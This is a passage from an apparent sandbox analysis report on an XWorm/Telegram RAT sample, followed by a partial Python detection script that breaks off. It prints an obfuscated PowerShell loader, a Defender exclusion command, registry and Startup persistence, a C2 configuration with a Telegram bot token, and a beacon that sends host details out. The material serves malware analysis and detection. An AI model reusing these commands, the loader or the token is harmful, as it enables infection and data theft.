$_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=$ysqdxYMCHCLNa.GetMethod(''+[Char](71)+''+'
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\KrnlSetupSus.exe" , ParentImage: C:\ProgramData\KrnlSetupSus.exe, ParentProcessId: 7424, ParentProcessName: KrnlSetupSus.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', ProcessId: 7712, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\KrnlSetupSus.exe" , ParentImage: C:\ProgramData\KrnlSetupSus.exe, ParentProcessId: 7424, ParentProcessName: KrnlSetupSus.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', ProcessId: 7712, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\ntoskrnl.exe, EventID: 13, EventType: SetValue, Image: C:\ProgramData\KrnlSetupSus.exe, ProcessId: 7424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntoskrnl
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\KrnlSetupSus.exe" , ParentImage: C:\ProgramData\KrnlSetupSus.exe, ParentProcessId: 7424, ParentProcessName: KrnlSetupSus.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', ProcessId: 7712, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\ProgramData\KrnlSetupSus.exe, ProcessId: 7424, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 7680, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=$ysqdxYMCHCLNa.GetMethod(''+[Char](71)+''+'
                              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                              2024-12-14T18:53:48.901505+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 149.154.167.220 | 443 | TCP


                              AV Detection

                              Source: RdLfpZY5A9.exeAvira: detected
                              Source: C:\ProgramData\ntoskrnl.exeAvira: detection malicious, Label: TR/Spy.Gen
                              Source: C:\ProgramData\KrnlSetupSus.exeAvira: detection malicious, Label: TR/Spy.Gen
                              Source: C:\ProgramData\Install.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                              Source: 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/Zx6DUkf9"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "driver.exe", "Telegram Token": "6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI", "Telegram Chatid": "5999137434"}
                              Source: KrnlSetupSus.exe.7424.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage"}
                              Source: C:\ProgramData\Install.exeReversingLabs: Detection: 70%
                              Source: C:\ProgramData\KrnlSetupSus.exeReversingLabs: Detection: 73%
                              Source: C:\ProgramData\ntoskrnl.exeReversingLabs: Detection: 73%
                              Source: RdLfpZY5A9.exeReversingLabs: Detection: 65%
                              Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Source: C:\ProgramData\ntoskrnl.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\KrnlSetupSus.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Install.exeJoe Sandbox ML: detected
                              Source: RdLfpZY5A9.exeJoe Sandbox ML: detected
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: https://pastebin.com/raw/Zx6DUkf9
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: <123456789>
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: <Xwormmm>
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: ezzznikka
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: driver.exe
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: %ProgramData%
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: ntoskrnl.exe
                              Source: C:\ProgramData\Install.exeCode function: 2_2_007C1000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_007C1000

                              Exploits

                              Source: Yara matchFile source: 2.2.Install.exe.7c40b0.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.1a84bcc81a8.13.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.1a854270000.16.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.Install.exe.7c40b0.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.Install.exe.7c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.Install.exe.7c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.1a84bcc81a8.13.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.Install.exe.7c40b0.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.Install.exe.7c40b0.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.1a854270000.16.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000002.1516696154.000001A854270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1404083892.00000000007C2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000002.1499817567.000001A84BCC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Install.exe PID: 7408, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Install.exe, type: DROPPED
                              Source: RdLfpZY5A9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49713 version: TLS 1.2
                              Source: RdLfpZY5A9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Diagnostics.pdb source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbx source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ~1.PDB @7_9)ux source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error3)y source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb04 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: mp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorV)y source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\symsrv.dllp.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C56D654 FindFirstFileExW,3_2_1C56D654
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C56D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_1C56D7D8
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD0D654 FindFirstFileExW,6_2_00000290EDD0D654
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD0D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00000290EDD0D7D8
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E99175D654 FindFirstFileExW,7_2_000002E99175D654
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E99175D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_000002E99175D7D8
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCED7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_00000213BDCED7D8
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCED654 FindFirstFileExW,10_2_00000213BDCED654
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709DD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_00000158709DD7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709DD654 FindFirstFileExW,11_2_00000158709DD654
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB158D654 FindFirstFileExW,12_2_0000026DB158D654
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB158D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_0000026DB158D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F066D654 FindFirstFileExW,13_2_000002A3F066D654
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F066D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_000002A3F066D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBBD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000002C9AFBBD7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBBD654 FindFirstFileExW,15_2_000002C9AFBBD654
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD4D654 FindFirstFileExW,16_2_000002C06FD4D654
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD4D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_000002C06FD4D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3BD654 FindFirstFileExW,17_2_000002917C3BD654
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3BD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_000002917C3BD7D8

                              Networking

                              Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.8:49713 -> 149.154.167.220:443
                              Source: C:\Windows\System32\svchost.exeDomain query: pastebin.com
                              Source: C:\Windows\System32\svchost.exeDomain query: api.telegram.org
                              Source: Malware configuration extractorURLs: https://pastebin.com/raw/Zx6DUkf9
                              Source: unknownDNS query: name: pastebin.com
                              Source: unknownDNS query: name: api.telegram.org
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED
                              Source: global trafficTCP traffic: 192.168.2.8:49716 -> 115.69.183.222:37593
                              Source: global trafficHTTP traffic detected: GET /raw/Zx6DUkf9 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1A2A8BD1A549B29BFB2C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20KMXL7DUF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20ezzznikka HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: unknownDNS query: name: ip-api.com
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /raw/Zx6DUkf9 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1A2A8BD1A549B29BFB2C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20KMXL7DUF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20ezzznikka HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Source: global trafficDNS traffic detected: DNS query: ip-api.com
                              Source: global trafficDNS traffic detected: DNS query: pastebin.com
                              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
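The network indicators above (pastebin raw fetch, Telegram bot beacon, ip-api hosting check, and a TCP connection to an address that was never resolved by DNS) can be re-detected in logs. The following is an added example, not code from the Joe Sandbox report or from the malware: the log format is constructed for the demonstration (one line per event: kind, source, destination, and for HTTP the method and request), and the sample lines reuse the report's own indicator values plus one benign connectivity check. The Telegram parser decodes the beacon's text parameter into its recon fields and truncates the bot token so it cannot be reused from the output.

```python
"""Re-detect the XWorm network indicators from this report in log lines."""
import re
from urllib.parse import parse_qs

TELEGRAM_BOT_PATH = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(\w+)$")
XWORM_BANNER = re.compile(r"\[(XWorm[^\]]*)\]")

# Constructed sample log (format: kind src dst [answer | method request]).
# Indicator values are the ones the report lists; the last two lines are a
# benign connectivity check added to show what is not flagged.
SAMPLE_LOG = """\
dns 192.168.2.8 pastebin.com 104.20.4.235
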